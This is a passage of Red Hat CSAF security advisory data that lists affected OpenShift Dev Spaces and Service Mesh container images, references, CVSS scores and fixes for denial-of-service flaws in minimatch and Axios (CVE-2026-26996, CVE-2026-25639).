"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "RHBZ#2441268",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441268"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26996"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5",
"url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26"
}
],
"release_date": "2026-02-20T03:05:21.105000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns"
}
]
}
RHSA-2026:3106
Vulnerability from csaf_redhat - Published: 2026-02-23 17:14 - Updated: 2026-04-16 10:28A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
| URL | Category | ||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Kiali 2.4.13 for Red Hat OpenShift Service Mesh 3.0\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Kiali 2.4.13, for Red Hat OpenShift Service Mesh 3.0, provides observability for the service mesh by offering a visual representation of the mesh topology and metrics, helping users monitor, trace, and manage efficiently\n\nSecurity Fix(es):\n\n* kiali-ossmc-rhel9: Axios affected by Denial of Service via __proto__ Key in mergeConfig (CVE-2026-25639)\n\n* kiali-rhel9: Axios affected by Denial of Service via __proto__ Key in mergeConfig (CVE-2026-25639)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:3106",
"url": "https://access.redhat.com/errata/RHSA-2026:3106"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/cve-2026-25639",
"url": "https://access.redhat.com/security/cve/cve-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification",
"url": "https://access.redhat.com/security/updates/classification"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_3106.json"
}
],
"title": "Red Hat Security Advisory: Kiali 2.4.13 for Red Hat OpenShift Service Mesh 3.0",
"tracking": {
"current_release_date": "2026-04-16T10:28:08+00:00",
"generator": {
"date": "2026-04-16T10:28:08+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:3106",
"initial_release_date": "2026-02-23T17:14:27+00:00",
"revision_history": [
{
"date": "2026-02-23T17:14:27+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-02-23T17:14:32+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T10:28:08+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Service Mesh 3",
"product": {
"name": "Red Hat OpenShift Service Mesh 3",
"product_id": "Red Hat OpenShift Service Mesh 3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:3.0::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Service Mesh"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:f3cc238553d49a1c5b3764f73eb507dc8d9edf9bea02e7168f78e2e7ac77682f_amd64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:f3cc238553d49a1c5b3764f73eb507dc8d9edf9bea02e7168f78e2e7ac77682f_amd64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:f3cc238553d49a1c5b3764f73eb507dc8d9edf9bea02e7168f78e2e7ac77682f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel9@sha256%3Af3cc238553d49a1c5b3764f73eb507dc8d9edf9bea02e7168f78e2e7ac77682f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771373071"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:f342935b5de0a471c12d3396374d2075381ff9aec4d75eabd3c6b26346e501d6_amd64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:f342935b5de0a471c12d3396374d2075381ff9aec4d75eabd3c6b26346e501d6_amd64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:f342935b5de0a471c12d3396374d2075381ff9aec4d75eabd3c6b26346e501d6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel9@sha256%3Af342935b5de0a471c12d3396374d2075381ff9aec4d75eabd3c6b26346e501d6?arch=amd64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771372940"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6cb5db65d47da4e5761ae6c7b73b1c1fd889195e7021569ca41a30f91bbba375_arm64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6cb5db65d47da4e5761ae6c7b73b1c1fd889195e7021569ca41a30f91bbba375_arm64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:6cb5db65d47da4e5761ae6c7b73b1c1fd889195e7021569ca41a30f91bbba375_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel9@sha256%3A6cb5db65d47da4e5761ae6c7b73b1c1fd889195e7021569ca41a30f91bbba375?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771373071"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:38243f02786d10064768d4355d8ba80eb5c0892c912730682c58c6b259629a98_arm64",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:38243f02786d10064768d4355d8ba80eb5c0892c912730682c58c6b259629a98_arm64",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel9@sha256:38243f02786d10064768d4355d8ba80eb5c0892c912730682c58c6b259629a98_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kiali-ossmc-rhel9@sha256%3A38243f02786d10064768d4355d8ba80eb5c0892c912730682c58c6b259629a98?arch=arm64\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771372940"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:d014dc5331b395c2dbf42011f92b3ebd728b8078d3c16068d658cd42bd6f210d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:d014dc5331b395c2dbf42011f92b3ebd728b8078d3c16068d658cd42bd6f210d_ppc64le",
"product_id": "registry.redhat.io/openshift-service-mesh/kiali-rhel9@sha256:d014dc5331b395c2dbf42011f92b3ebd728b8078d3c16068d658cd42bd6f210d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kiali-rhel9@sha256%3Ad014dc5331b395c2dbf42011f92b3ebd728b8078d3c16068d658cd42bd6f210d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-service-mesh\u0026tag=1771373071"
}
}
},
{
"category": "product_version",
